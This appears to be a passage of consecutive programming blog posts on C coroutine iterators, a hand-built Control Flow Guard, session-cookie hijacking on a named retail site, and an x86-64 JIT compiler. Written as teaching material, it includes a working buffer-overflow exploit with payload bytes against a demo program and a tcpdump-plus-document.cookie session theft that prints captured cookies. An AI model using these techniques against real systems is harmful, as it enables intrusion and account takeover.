void tree_insert(struct tree **, char *k, char *v);
char *tree_find(struct tree *, char *k);
void tree_visit(struct tree *, void (*f)(char *, char *));
void tree_destroy(struct tree *);
An empty tree is the NULL pointer, hence the double-pointer for insert. In the demonstration it’s an unbalanced search tree, but this could very well be a balanced search tree with the addition of another field on the structure.
For the traversal, first visit the root node, then traverse its left tree, and finally traverse its right tree. It makes for a simple, recursive definition — the sort of thing you’d teach a beginner. Here’s a definition that accepts a callback, which the caller will use to visit each key/value in the tree. This really is as simple as it gets.
void
tree_visit(struct tree *t, void (*f)(char *, char *))
{
if (t) {
f(t->key, t->value);
tree_visit(t->left, f);
tree_visit(t->right, f);
}
}
Unfortunately this isn’t so convenient for the caller, who has to split off a callback function that lacks context, then hand over control to the traversal function.
void
printer(char *k, char *v)
{
printf("%s = %s\n", k, v);
}
void
print_tree(struct tree *tree)
{
tree_visit(tree, printer);
}
Usually it’s much nicer for the caller if instead it’s provided an iterator, which the caller can invoke at will. Here’s an interface for it, just two functions.
struct tree_it *tree_iterator(struct tree *);
int tree_next(struct tree_it *, char **k, char **v);
The first constructs an iterator object, and the second one visits a key/value pair each time it’s called. It returns 0 when traversal is complete, automatically freeing any resources associated with the iterator.
The caller now looks like this:
char *k, *v;
struct tree_it *it = tree_iterator(tree);
while (tree_next(it, &k, &v))
printf("%s = %s\n", k, v);
Notice I haven’t defined struct tree_it
. That’s because I’ve got
four different implementations, each taking a different approach. The
last one will use stack clashing.
With just the standard facilities provided by C, there’s a some manual bookkeeping that has to take place in order to convert the recursive definition into an iterator. Depth-first traversal is a stack-oriented process, and with recursion the stack is implicit in the call stack. As an iterator, the traversal stack needs to be managed explicitly. The iterator needs to keep track of the path it took so that it can backtrack, which means keeping track of parent nodes as well as which branch was taken.
Here’s my little implementation, which, to keep things simple, has a hard depth limit of 32. It’s structure definition includes a stack of node pointers, and 2 bits of information per visited node, stored across a 64-bit integer.
struct tree_it {
struct tree *stack[32];
unsigned long long state;
int nstack;
};
struct tree_it *
tree_iterator(struct tree *t)
{
struct tree_it *it = malloc(sizeof(*it));
it->stack[0] = t;
it->state = 0;
it->nstack = 1;
return it;
}
The 2 bits track three different states for each visited node:
It works out to the following. Don’t worry too much about trying to understand how this works. My point is to demonstrate that converting the recursive definition into an iterator complicates the implementation.
int
tree_next(struct tree_it *it, char **k, char **v)
{
while (it->nstack) {
int shift = (it->nstack - 1) * 2;
int state = 3u & (it->state >> shift);
struct tree *t = it->stack[it->nstack - 1];
it->state += 1ull << shift;
switch (state) {
case 0:
*k = t->key;
*v = t->value;
if (t->left) {
it->stack[it->nstack++] = t->left;
it->state &= ~(3ull << (shift + 2));
}
return 1;
case 1:
if (t->right) {
it->stack[it->nstack++] = t->right;
it->state &= ~(3ull << (shift + 2));
}
break;
case 2:
it->nstack--;
break;
}
}
free(it);
return 0;
}
Wouldn’t it be nice to keep both the recursive definition while also getting an iterator? There’s an exact solution to that: coroutines.
C doesn’t come with coroutines, but there are a number of libraries
available. We can also build our own coroutines. One way to do that is
with user contexts (<ucontext.h>
) provided by the X/Open System
Interfaces Extension (XSI), an extension to POSIX. This set of
functions allow programs to create their own call stacks and switch
between them. That’s the key ingredient for coroutines. Caveat: These
functions aren’t widely available, and probably shouldn’t be used in
new code.
Here’s my iterator structure definition.
#define _XOPEN_SOURCE 600
#include <ucontext.h>
struct tree_it {
char *k;
char *v;
ucontext_t coroutine;
ucontext_t yield;
};
It needs one context for the original stack and one context for the
iterator’s stack. Each time the iterator is invoked, it the program
will switch to the other stack, find the next value, then switch back.
This process is called yielding. Values are passed between context
using the k
(key) and v
(value) fields on the iterator.
Before I get into initialization, here’s the actual traversal
coroutine. It’s nearly the same as the original recursive definition
except for the swapcontext()
. This is the yield, pausing execution
and sending control back to the caller. The current context is saved
in the first argument, and the second argument becomes the current
context.
static void
coroutine(struct tree *t, struct tree_it *it)
{
if (t) {
it->k = t->key;
it->v = t->value;
swapcontext(&it->coroutine, &it->yield);
coroutine(t->left, it);
coroutine(t->right, it);
}
}
While the actual traversal is simple again, initialization is more
complicated. The first problem is that there’s no way to pass pointer
arguments to the coroutine. Technically only int
arguments are
permitted. (All the online tutorials get this wrong.) To work around
this problem, I smuggle the arguments in as global variables. This
would cause problems should two different threads try to create
iterators at the same time, even on different trees.
static struct tree *tree_arg;
static struct tree_it *tree_it_arg;
static void
coroutine_init(void)
{
coroutine(tree_arg, tree_it_arg);
}
The stack has to be allocated manually, which I do with a call to
malloc()
. Nothing fancy is needed, though this means the new
stack won’t have a guard page. For the stack size, I use the suggested
value of SIGSTKSZ
. The makecontext()
function is what creates the
new context from scratch, but the new context must first be
initialized with getcontext()
, even though that particular snapshot
won’t actually be used.
struct tree_it *
tree_iterator(struct tree *t)
{
struct tree_it *it = malloc(sizeof(*it));
it->coroutine.uc_stack.ss_sp = malloc(SIGSTKSZ);
it->coroutine.uc_stack.ss_size = SIGSTKSZ;
it->coroutine.uc_link = &it->yield;
getcontext(&it->coroutine);
makecontext(&it->coroutine, coroutine_init, 0);
tree_arg = t;
tree_it_arg = it;
return it;
}
Notice I gave it a function pointer, a lot like I’m starting a new thread. This is no coincidence. There’s a lot of similarity between coroutines and multiple threads, as you’ll soon see.
Finally the iterator function itself. Since NULL isn’t a valid key, it initializes the key to NULL before yielding to the iterator context. If the iterator has no more nodes to visit, it doesn’t set the key, which can be detected when control returns.
int
tree_next(struct tree_it *it, char **k, char **v)
{
it->k = 0;
swapcontext(&it->yield, &it->coroutine);
if (it->k) {
*k = it->k;
*v = it->v;
return 1;
} else {
free(it->coroutine.uc_stack.ss_sp);
free(it);
return 0;
}
}
That’s all it takes to create and operate a coroutine in C, provided you’re on a system with these XSI extensions.
Instead of a coroutine, we could just use actual threads and a couple of semaphores to synchronize them. This is a heavy implementation and also probably shouldn’t be used in practice, but at least it’s fully portable.
Here’s the structure definition:
struct tree_it {
struct tree *t;
char *k;
char *v;
sem_t visitor;
sem_t main;
pthread_t thread;
};
The main thread will wait on one semaphore and the iterator thread will wait on the other. This should sound very familiar.
The actual traversal function looks the same, but with sem_post()
and sem_wait()
as the yield.
static void
visit(struct tree *t, struct tree_it *it)
{
if (t) {
it->k = t->key;
it->v = t->value;
sem_post(&it->main);
sem_wait(&it->visitor);
visit(t->left, it);
visit(t->right, it);
}
}
There’s a separate function to initialize the iterator context again.
static void *
thread_entrance(void *arg)
{
struct tree_it *it = arg;
sem_wait(&it->visitor);
visit(it->t, it);
sem_post(&it->main);
return 0;
}
Creating the iterator only requires initializing the semaphores and creating the thread:
struct tree_it *
tree_iterator(struct tree *t)
{
struct tree_it *it = malloc(sizeof(*it));
it->t = t;
sem_init(&it->visitor, 0, 0);
sem_init(&it->main, 0, 0);
pthread_create(&it->thread, 0, thread_entrance, it);
return it;
}
The iterator function looks just like the coroutine version.
int
tree_next(struct tree_it *it, char **k, char **v)
{
it->k = 0;
sem_post(&it->visitor);
sem_wait(&it->main);
if (it->k) {
*k = it->k;
*v = it->v;
return 1;
} else {
pthread_join(it->thread, 0);
sem_destroy(&it->main);
sem_destroy(&it->visitor);
free(it);
return 0;
}
}
Overall, this is almost identical to the coroutine version.
Finally I can tie this back into the topic at hand. Without either XSI
extensions or Pthreads, we can (usually) create coroutines by abusing
setjmp()
and longjmp()
. Technically this violates two of the C’s
rules and relies on undefined behavior, but it generally works. This
is not my own invention, and it dates back to at least 2010.
From the very beginning, C has provided a crude “exception” mechanism
that allows the stack to be abruptly unwound back to a previous state.
It’s a sort of non-local goto. Call setjmp()
to capture an opaque
jmp_buf
object to be used in the future. This function returns 0
this first time. Hand that value to longjmp()
later, even in a
different function, and setjmp()
will return again, this time with a
non-zero value.
It’s technically unsuitable for coroutines because the jump is a
one-way trip. The unwound stack invalidates any jmp_buf
that was
created after the target of the jump. In practice, though, you can
still use these jumps, which is one rule being broken.
That’s where stack clashing comes into play. In order for it to be a
proper coroutine, it needs to have its own stack. But how can we do
that with these primitive C utilities? Extend the stack to overlap
the heap, call setjmp()
to capture a coroutine on it, then return.
Generally we can get away with using longjmp()
to return to this
heap-allocated stack.
Here’s my iterator definition for this one. Like the XSI context
struct, this has two jmp_buf
“contexts.” The stack
holds the
iterator’s stack buffer so that it can be freed, and the gap
field
will be used to prevent the optimizer from spoiling our plans.
struct tree_it {
char *k;
char *v;
char *stack;
volatile char *gap;
jmp_buf coroutine;
jmp_buf yield;
};
The coroutine looks familiar again. This time the yield is performed
with setjmmp()
and longjmp()
, just like swapcontext()
. Remember
that setjmp()
returns twice, hence the branch. The longjmp()
never
returns.
static void
coroutine(struct tree *t, struct tree_it *it)
{
if (t) {
it->k = t->key;
it->v = t->value;
if (!setjmp(it->coroutine))
longjmp(it->yield, 1);
coroutine(t->left, it);
coroutine(t->right, it);
}
}
Next is the tricky part to cause the stack clash. First, allocate the
new stack with malloc()
so that we can get its address. Then use a
local variable on the stack to determine how much the stack needs to
grow in order to overlap with the allocation. Taking the difference
between these pointers is illegal as far as the language is concerned,
making this the second rule I’m breaking. I can imagine an
implementation where the stack and heap are in two separate
kinds of memory, and it would be meaningless to take the difference. I
don’t actually have to imagine very hard, because this is actually how
it used to work on the 8086 with its segmented memory
architecture.
struct tree_it *
tree_iterator(struct tree *t)
{
struct tree_it *it = malloc(sizeof(*it));
it->stack = malloc(STACK_SIZE);
char marker;
char gap[&marker - it->stack - STACK_SIZE];
it->gap = gap; // prevent optimization
if (!setjmp(it->yield))
coroutine_init(t, it);
return it;
}
I’m using a variable-length array (VLA) named gap
to indirectly
control the stack pointer, moving it over the heap. I’m assuming the
stack grows downward, since otherwise the sign would be wrong.
The compiler is smart and will notice I’m not actually using gap
,
and it’s happy to throw it away. In fact, it’s vitally important that
I don’t touch it since the guard page, along with a bunch of
unmapped memory, is actually somewhere in the middle of that array. I
only want the array for its side effect, but that side effect isn’t
officially supported, which means the optimizer doesn’t need to
consider it in its decisions. To inhibit the optimizer, I store the
array’s address where someone might potentially look at it, meaning
the array has to exist.
Finally, the iterator function looks just like the others, again.
int
tree_next(struct tree_it *it, char **k, char **v)
{
it->k = 0;
if (!setjmp(it->yield))
longjmp(it->coroutine, 1);
if (it->k) {
*k = it->k;
*v = it->v;
return 1;
} else {
free(it->stack);
free(it);
return 0;
}
}
And that’s it: a nasty hack using a stack clash to create a context
for a setjmp()
+longjmp()
coroutine.
If an application has a buffer overflow vulnerability, an attacker may use it to overwrite a function pointer and, by the call through that pointer, control the execution flow of the program. This is one way to initiate a Return Oriented Programming (ROP) attack, where the attacker constructs a chain of gadget addresses — a gadget being a couple of instructions followed by a return instruction, all in the original program — using the indirect call as the starting point. The execution then flows from gadget to gadget so that the program does what the attacker wants it to do, all without the attacker supplying any code.
The two most widely practiced ROP attack mitigation techniques today are Address Space Layout Randomization (ASLR) and stack protectors. The former randomizes the base address of executable images (programs, shared libraries) so that process memory layout is unpredictable to the attacker. The addresses in the ROP attack chain depend on the run-time memory layout, so the attacker must also find and exploit an information leak to bypass ASLR.
For stack protectors, the compiler allocates a canary on the stack above other stack allocations and sets the canary to a per-thread random value. If a buffer overflows to overwrite the function return pointer, the canary value will also be overwritten. Before the function returns by the return pointer, it checks the canary. If the canary doesn’t match the known value, the program is aborted.
CFG works similarly — performing a check prior to passing control to the address in a pointer — except that instead of checking a canary, it checks the target address itself. This is a lot more sophisticated, and, unlike a stack canary, essentially requires coordination by the platform. The check must be informed on all valid call targets, whether from the main program or from shared libraries.
While not (yet?) widely deployed, a worthy mention is Clang’s SafeStack. Each thread gets two stacks: a “safe stack” for return pointers and other safely-accessed values, and an “unsafe stack” for buffers and such. Buffer overflows will corrupt other buffers but will not overwrite return pointers, limiting the effect of their damage.
Consider this trivial C program, demo.c
:
int
main(void)
{
char name[8];
gets(name);
printf("Hello, %s.\n", name);
return 0;
}
It reads a name into a buffer and prints it back out with a greeting.
While trivial, it’s far from innocent. That naive call to gets()
doesn’t check the bounds of the buffer, introducing an exploitable
buffer overflow. It’s so obvious that both the compiler and linker
will yell about it.
For simplicity, suppose the program also contains a dangerous function.
void
self_destruct(void)
{
puts("**** GO BOOM! ****");
}
The attacker can use the buffer overflow to call this dangerous function.
To make this attack simpler for the sake of the article, assume the
program isn’t using ASLR (e.g. without -fpie
/-pie
, or with
-fno-pie
/-no-pie
). For this particular example, I’ll also
explicitly disable buffer overflow protections (e.g. _FORTIFY_SOURCE
and stack protectors).
$ gcc -Os -fno-pie -D_FORTIFY_SOURCE=0 -fno-stack-protector \
-o demo demo.c
First, find the address of self_destruct()
.
$ readelf -a demo | grep self_destruct
46: 00000000004005c5 10 FUNC GLOBAL DEFAULT 13 self_destruct
This is on x86-64, so it’s a 64-bit address. The size of the name
buffer is 8 bytes, and peeking at the assembly I see an extra 8 bytes
allocated above, so there’s 16 bytes to fill, then 8 bytes to
overwrite the return pointer with the address of self_destruct
.
$ echo -ne 'xxxxxxxxyyyyyyyy\xc5\x05\x40\x00\x00\x00\x00\x00' > boom
$ ./demo < boom
Hello, xxxxxxxxyyyyyyyy?@.
**** GO BOOM! ****
Segmentation fault
With this input I’ve successfully exploited the buffer overflow to
divert control to self_destruct()
. When main
tries to return into
libc, it instead jumps to the dangerous function, and then crashes
when that function tries to return — though, presumably, the system
would have self-destructed already. Turning on the stack protector
stops this exploit.
$ gcc -Os -fno-pie -D_FORTIFY_SOURCE=0 -fstack-protector \
-o demo demo.c
$ ./demo < boom
Hello, xxxxxxxxaaaaaaaa?@.
*** stack smashing detected ***: ./demo terminated
======= Backtrace: =========
... lots of backtrace stuff ...
The stack protector successfully blocks the exploit. To get around this, I’d have to either guess the canary value or discover an information leak that reveals it.
The stack protector transformed the program into something that looks like the following:
int
main(void)
{
long __canary = __get_thread_canary();
char name[8];
gets(name);
printf("Hello, %s.\n", name);
if (__canary != __get_thread_canary())
abort();
return 0;
}
However, it’s not actually possible to implement the stack protector within C. Buffer overflows are undefined behavior, and a canary is only affected by a buffer overflow, allowing the compiler to optimize it away.
After the attacker successfully self-destructed the last computer, upper management has mandated password checks before all self-destruction procedures. Here’s what it looks like now:
void
self_destruct(char *password)
{
if (strcmp(password, "12345") == 0)
puts("**** GO BOOM! ****");
}
The password is hardcoded, and it’s the kind of thing an idiot would have on his luggage, but assume it’s actually unknown to the attacker. Especially since, as I’ll show shortly, it won’t matter. Upper management has also mandated stack protectors, so assume that’s enabled from here on.
Additionally, the program has evolved a bit, and now uses a function pointer for polymorphism.
struct greeter {
char name[8];
void (*greet)(struct greeter *);
};
void
greet_hello(struct greeter *g)
{
printf("Hello, %s.\n", g->name);
}
void
greet_aloha(struct greeter *g)
{
printf("Aloha, %s.\n", g->name);
}
There’s now a greeter object and the function pointer makes its
behavior polymorphic. Think of it as a hand-coded virtual function for
C. Here’s the new (contrived) main
:
int
main(void)
{
struct greeter greeter = {.greet = greet_hello};
gets(greeter.name);
greeter.greet(&greeter);
return 0;
}
(In a real program, something else provides greeter
and picks its
own function pointer for greet
.)
Rather than overwriting the return pointer, the attacker has the opportunity to overwrite the function pointer on the struct. Let’s reconstruct the exploit like before.
$ readelf -a demo | grep self_destruct
54: 00000000004006a5 10 FUNC GLOBAL DEFAULT 13 self_destruct
We don’t know the password, but we do know (from peeking at the disassembly) that the password check is 16 bytes. The attack should instead jump 16 bytes into the function, skipping over the check (0x4006a5 + 16 = 0x4006b5).
$ echo -ne 'xxxxxxxx\xb5\x06\x40\x00\x00\x00\x00\x00' > boom
$ ./demo < boom
**** GO BOOM! ****
Neither the stack protector nor the password were of any help. The stack protector only protects the return pointer, not the function pointer on the struct.
This is where the Control Flow Guard comes into play. With CFG
enabled, the compiler inserts a check before calling the greet()
function pointer. It must point to the beginning of a known function,
otherwise it will abort just like the stack protector. Since the
middle of self_destruct()
isn’t the beginning of a function, it
would abort if this exploit is attempted.
However, I’m on Linux and there’s no CFG on Linux (yet?). So I’ll implement it myself, with manual checks.
As described in the PDF linked at the top of this article, CFG on Windows is implemented using a bitmap. Each bit in the bitmap represents 8 bytes of memory. If those 8 bytes contains the beginning of a function, the bit will be set to one. Checking a pointer means checking its associated bit in the bitmap.
For my CFG, I’ve decided to keep the same 8-byte resolution: the bottom three bits of the target address will be dropped. The next 24 bits will be used to index into the bitmap. All other bits in the pointer will be ignored. A 24-bit bit index means the bitmap will only be 2MB.
These 24 bits is perfectly sufficient for 32-bit systems, but it means on 64-bit systems there may be false positives: some addresses will not represent the start of a function, but will have their bit set to 1. This is acceptable, especially because only functions known to be targets of indirect calls will be registered in the table, reducing the false positive rate.
Note: Relying on the bits of a pointer cast to an integer is unspecified and isn’t portable, but this implementation will work fine anywhere I would care to use it.
Here are the CFG parameters. I’ve made them macros so that they can
easily be tuned at compile-time. The cfg_bits
is the integer type
backing the bitmap array. The CFG_RESOLUTION
is the number of bits
dropped, so “3” is a granularity of 8 bytes.
typedef unsigned long cfg_bits;
#define CFG_RESOLUTION 3
#define CFG_BITS 24
Given a function pointer f
, this macro extracts the bitmap index.
#define CFG_INDEX(f) \
(((uintptr_t)f >> CFG_RESOLUTION) & ((1UL << CFG_BITS) - 1))
The CFG bitmap is just an array of integers. Zero it to initialize.
struct cfg {
cfg_bits bitmap[(1UL << CFG_BITS) / (sizeof(cfg_bits) * CHAR_BIT)];
};
Functions are manually registered in the bitmap using
cfg_register()
.
void
cfg_register(struct cfg *cfg, void *f)
{
unsigned long i = CFG_INDEX(f);
size_t z = sizeof(cfg_bits) * CHAR_BIT;
cfg->bitmap[i / z] |= 1UL << (i % z);
}
Because functions are registered at run-time, it’s fully compatible
with ASLR. If ASLR is enabled, the bitmap will be a little different
each run. On the same note, it may be worth XORing each bitmap element
with a random, run-time value — along the same lines as the stack
canary value — to make it harder for an attacker to manipulate the
bitmap should he get the ability to overwrite it by a vulnerability.
Alternatively the bitmap could be switched to read-only (e.g.
mprotect()
) once everything is registered.
And finally, the check function, used immediately before indirect
calls. It ensures f
was previously passed to cfg_register()
(except for false positives, as discussed). Since it will be invoked
often, it needs to be fast and simple.
void
cfg_check(struct cfg *cfg, void *f)
{
unsigned long i = CFG_INDEX(f);
size_t z = sizeof(cfg_bits) * CHAR_BIT;
if (!((cfg->bitmap[i / z] >> (i % z)) & 1))
abort();
}
And that’s it! Now augment main
to make use of it:
struct cfg cfg;
int
main(void)
{
cfg_register(&cfg, self_destruct); // to prove this works
cfg_register(&cfg, greet_hello);
cfg_register(&cfg, greet_aloha);
struct greeter greeter = {.greet = greet_hello};
gets(greeter.name);
cfg_check(&cfg, greeter.greet);
greeter.greet(&greeter);
return 0;
}
And now attempting the exploit:
$ ./demo < boom
Aborted
Normally self_destruct()
wouldn’t be registered since it’s not a
legitimate target of an indirect call, but the exploit still didn’t
work because it called into the middle of self_destruct()
, which
isn’t a valid address in the bitmap. The check aborts the program
before it can be exploited.
In a real application I would have a global cfg
bitmap for
the whole program, and define cfg_check()
in a header as an inline
function.
Despite being possible implement in straight C without the help of the toolchain, it would be far less cumbersome and error-prone to let the compiler and platform handle Control Flow Guard. That’s the right place to implement it.
Update: Ted Unangst pointed out OpenBSD performing a similar check in its mbuf library. Instead of a bitmap, the function pointer is replaced with an index into an array of registered function pointers. That approach is cleaner, more efficient, completely portable, and has no false positives.
]]>These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.
The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.
Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer get this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.
I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.
To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.
The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.
tcpdump -A -l dst www.roadrunnersports.com and dst port 80 | \
grep "^Cookie: "
This command tells tcpdump to dump selected packet content as ASCII
(-A
). It also sets output to line-buffered so that I can see packets
as soon as they arrive (-l
). The filter will only match packets
going out to this website and only on port 80 (HTTP), so I won’t see
any extraneous noise (dst <addr> and dst port <port>
). Finally, I
crudely run that all through grep to see if any cookies fall out.
On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:
Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
-bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4
That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.
document.cookie = "Cookie: JSESSIONID=99004F61A4ED162641DC36046A" +
"C81EAB.prd_rrs12;";
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
"1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c";
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";
Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can checkout and complete the order. My browser is as genuine as hers.
The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents the JavaScript from accessing them, since an active attacker could inject their own JavaScript in the page. Customers would appear to be logged out on plain HTTP pages, which is confusing.
However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.
]]>Monday’s /r/dailyprogrammer challenge was to write a program to
read a recurrence relation definition and, through interpretation,
iterate it to some number of terms. It’s given an initial term
(u(0)
) and a sequence of operations, f
, to apply to the previous
term (u(n + 1) = f(u(n))
) to compute the next term. Since it’s an
easy challenge, the operations are limited to addition, subtraction,
multiplication, and division, with one operand each.
For example, the relation u(n + 1) = (u(n) + 2) * 3 - 5
would be
input as +2 *3 -5
. If u(0) = 0
then,
u(1) = 1
u(2) = 4
u(3) = 13
u(4) = 40
u(5) = 121
Rather than write an interpreter to apply the sequence of operations, for my submission (mirror) I took the opportunity to write a simple x86-64 Just-In-Time (JIT) compiler. So rather than stepping through the operations one by one, my program converts the operations into native machine code and lets the hardware do the work directly. In this article I’ll go through how it works and how I did it.
Update: The follow-up challenge uses Reverse Polish notation to allow for more complicated expressions. I wrote another JIT compiler for my submission (mirror).
Modern operating systems have page-granularity protections for different parts of process memory: read, write, and execute. Code can only be executed from memory with the execute bit set on its page, memory can only be changed when its write bit is set, and some pages aren’t allowed to be read. In a running process, the pages holding program code and loaded libraries will have their write bit cleared and execute bit set. Most of the other pages will have their execute bit cleared and their write bit set.
The reason for this is twofold. First, it significantly increases the security of the system. If untrusted input was read into executable memory, an attacker could input machine code (shellcode) into the buffer, then exploit a flaw in the program to cause control flow to jump to and execute that code. If the attacker is only able to write code to non-executable memory, this attack becomes a lot harder. The attacker has to rely on code already loaded into executable pages (return-oriented programming).
Second, it catches program bugs sooner and reduces their impact, so
there’s less chance for a flawed program to accidentally corrupt user
data. Accessing memory in an invalid way will causes a segmentation
fault, usually leading to program termination. For example, NULL
points to a special page with read, write, and execute disabled.
Memory returned by malloc()
and friends will be writable and
readable, but non-executable. If the JIT compiler allocates memory
through malloc()
, fills it with machine instructions, and jumps to
it without doing any additional work, there will be a segmentation
fault. So some different memory allocation calls will be made instead,
with the details hidden behind an asmbuf
struct.
#define PAGE_SIZE 4096
struct asmbuf {
uint8_t code[PAGE_SIZE - sizeof(uint64_t)];
uint64_t count;
};
To keep things simple here, I’m just assuming the page size is 4kB. In
a real program, we’d use sysconf(_SC_PAGESIZE)
to discover the page
size at run time. On x86-64, pages may be 4kB, 2MB, or 1GB, but this
program will work correctly as-is regardless.
Instead of malloc()
, the compiler allocates memory as an anonymous
memory map (mmap()
). It’s anonymous because it’s not backed by a
file.
struct asmbuf *
asmbuf_create(void)
{
int prot = PROT_READ | PROT_WRITE;
int flags = MAP_ANONYMOUS | MAP_PRIVATE;
return mmap(NULL, PAGE_SIZE, prot, flags, -1, 0);
}
Windows doesn’t have POSIX mmap()
, so on that platform we use
VirtualAlloc()
instead. Here’s the equivalent in Win32.
struct asmbuf *
asmbuf_create(void)
{
DWORD type = MEM_RESERVE | MEM_COMMIT;
return VirtualAlloc(NULL, PAGE_SIZE, type, PAGE_READWRITE);
}
Anyone reading closely should notice that I haven’t actually requested that the memory be executable, which is, like, the whole point of all this! This was intentional. Some operating systems employ a security feature called W^X: “write xor execute.” That is, memory is either writable or executable, but never both at the same time. This makes the shellcode attack I described before even harder. For well-behaved JIT compilers it means memory protections need to be adjusted after code generation and before execution.
The POSIX mprotect()
function is used to change memory protections.
void
asmbuf_finalize(struct asmbuf *buf)
{
mprotect(buf, sizeof(*buf), PROT_READ | PROT_EXEC);
}
Or on Win32 (that last parameter is not allowed to be NULL
),
void
asmbuf_finalize(struct asmbuf *buf)
{
DWORD old;
VirtualProtect(buf, sizeof(*buf), PAGE_EXECUTE_READ, &old);
}
Finally, instead of free()
it gets unmapped.
void
asmbuf_free(struct asmbuf *buf)
{
munmap(buf, PAGE_SIZE);
}
And on Win32,
void
asmbuf_free(struct asmbuf *buf)
{
VirtualFree(buf, 0, MEM_RELEASE);
}
I won’t list the definitions here, but there are two “methods” for inserting instructions and immediate values into the buffer. This will be raw machine code, so the caller will be acting a bit like an assembler.
asmbuf_ins(struct asmbuf *, int size, uint64_t ins);
asmbuf_immediate(struct asmbuf *, int size, const void *value);
We’re only going to be concerned with three of x86-64’s many
registers: rdi
, rax
, and rdx
. These are 64-bit (r
) extensions
of the original 16-bit 8086 registers. The sequence of
operations will be compiled into a function that we’ll be able to call
from C like a normal function. Here’s what it’s prototype will look
like. It takes a signed 64-bit integer and returns a signed 64-bit
integer.
long recurrence(long);
The System V AMD64 ABI calling convention says that the first
integer/pointer function argument is passed in the rdi
register.
When our JIT compiled program gets control, that’s where its input
will be waiting. According to the ABI, the C program will be expecting
the result to be in rax
when control is returned. If our recurrence
relation is merely the identity function (it has no operations), the
only thing it will do is copy rdi
to rax
.
mov rax, rdi
There’s a catch, though. You might think all the mucky
platform-dependent stuff was encapsulated in asmbuf
. Not quite. As
usual, Windows is the oddball and has its own unique calling
convention. For our purposes here, the only difference is that the
first argument comes in rcx
rather than rdi
. Fortunately this only
affects the very first instruction and the rest of the assembly
remains the same.
The very last thing it will do, assuming the result is in rax
, is
return to the caller.
ret
So we know the assembly, but what do we pass to asmbuf_ins()
? This
is where we get our hands dirty.
If you want to do this the Right Way, you go download the x86-64 documentation, look up the instructions we’re using, and manually work out the bytes we need and how the operands fit into it. You know, like they used to do out of necessity back in the 60’s.
Fortunately there’s a much easier way. We’ll have an actual assembler
do it and just copy what it does. Put both of the instructions above
in a file peek.s
and hand it to nasm
. It will produce a raw binary
with the machine code, which we’ll disassemble with nidsasm
(the
NASM disassembler).
$ nasm peek.s
$ ndisasm -b64 peek
00000000 4889F8 mov rax,rdi
00000003 C3 ret
That’s straightforward. The first instruction is 3 bytes and the return is 1 byte.
asmbuf_ins(buf, 3, 0x4889f8); // mov rax, rdi
// ... generate code ...
asmbuf_ins(buf, 1, 0xc3); // ret
For each operation, we’ll set it up so the operand will already be
loaded into rdi
regardless of the operator, similar to how the
argument was passed in the first place. A smarter compiler would embed
the immediate in the operator’s instruction if it’s small (32-bits or
fewer), but I’m keeping it simple. To sneakily capture the “template”
for this instruction I’m going to use 0x0123456789abcdef
as the
operand.
mov rdi, 0x0123456789abcdef
Which disassembled with ndisasm
is,
00000000 48BFEFCDAB896745 mov rdi,0x123456789abcdef
-2301
Notice the operand listed little endian immediately after the instruction. That’s also easy!
long operand;
scanf("%ld", &operand);
asmbuf_ins(buf, 2, 0x48bf); // mov rdi, operand
asmbuf_immediate(buf, 8, &operand);
Apply the same discovery process individually for each operator you
want to support, accumulating the result in rax
for each.
switch (operator) {
case '+':
asmbuf_ins(buf, 3, 0x4801f8); // add rax, rdi
break;
case '-':
asmbuf_ins(buf, 3, 0x4829f8); // sub rax, rdi
break;
case '*':
asmbuf_ins(buf, 4, 0x480fafc7); // imul rax, rdi
break;
case '/':
asmbuf_ins(buf, 3, 0x4831d2); // xor rdx, rdx
asmbuf_ins(buf, 3, 0x48f7ff); // idiv rdi
break;
}
As an exercise, try adding support for modulus operator (%
), XOR
(^
), and bit shifts (<
, >
). With the addition of these
operators, you could define a decent PRNG as a recurrence relation. It
will also eliminate the closed form solution to this problem so
that we actually have a reason to do all this! Or, alternatively,
switch it all to floating point.
Once we’re all done generating code, finalize the buffer to make it
executable, cast it to a function pointer, and call it. (I cast it as
a void *
just to avoid repeating myself, since that will implicitly
cast to the correct function pointer prototype.)
asmbuf_finalize(buf);
long (*recurrence)(long) = (void *)buf->code;
// ...
x[n + 1] = recurrence(x[n]);
